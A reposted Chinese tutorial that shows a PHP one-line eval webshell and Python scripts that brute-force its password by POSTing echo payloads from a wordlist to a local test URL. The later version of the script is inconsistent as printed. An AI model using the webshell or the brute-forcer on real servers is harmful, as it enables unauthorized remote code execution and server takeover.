安基网 首页 编程 Python 查看内容

Python hacker 之 爆破一句话木马

2020-7-3 13:00| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 00x1:需要用到的模块如下:import requests00x2:首先我们了解一下一句话木马,一般post传递参一个简单的php一句话木马?phpeval($_POST)?先测试一下连接OK,没问题,我们用浏览器打开传参看一下由此可以看到密码为x,变量提交能匹配上即执行echo语句这时我猜大家都有了思路,构造post请求即可00x3:这 ...

00x1:

需要用到的模块如下:

import requests

00x2:

首先我们了解一下一句话木马,一般post传递参

一个简单的php一句话木马

eval($_POST['x'])

?>

先测试一下连接


OK,没问题,我们用浏览器打开传参看一下

由此可以看到密码为x,变量提交能匹配上即执行echo语句

这时我猜大家都有了思路,构造post请求即可

00x3:

这里我们可以利用网址特性提交多个参数


这样可以提高爆破效率

分析完成,下面我们开始进行写脚本

00x4:

简单爆破shell密码,shell为字典

#!/usr/bin/python

#-*- coding:utf-8 -*-

import requests

def req(url,s):

global html

data = {s:'echo xc666;'}

req = requests.post(url,data=data)

html = req.content

shell = ['z','y','x']

for s in shell:

req('http://127.0.0.1/shell.php',s)

if 'xc666' in html:

print "[+]Find password",s

break



00x5:

下面我们按我们刚才说的,一次多个参数,增加效率

首先整理一下字典

shell = []

f = open('shell.txt','r')

for x in f.readlines(): #去除换行等字符

x = x.strip()

shell.append(x)

print u"shell密码个数为:",len(shell)

for i in range(0,len(shell),2): #分割列表

b=shell[i:i+2]

print b



我们一次性提交两个参数测试一下

data = {s:'echo %s;'%s,ss:'echo %s;'%ss}

shell = []

def shelllist():

f = open('shell.txt','r')

for x in f.readlines(): #去除换行等字符

x = x.strip()

shell.append(x)

print u"shell密码个数为:",len(shell)

def main():

shelllist()

for i in range(0,len(shell),2): #分割列表

b=shell[i:i+2]

req('http://127.0.0.1/shell.php',b[0],b[1])

if b[0] in html:

print "[+]Find password",b[0]

break

elif b[1] in html:

print "[+]Find password", b[1]

break

main()

测试一下,一次执行两个密码

00x6:

https://github.com/hackxc/Pyhacker/

github项目地址

一次爆破5次密码,可自行调整




小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6844843552506118671/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部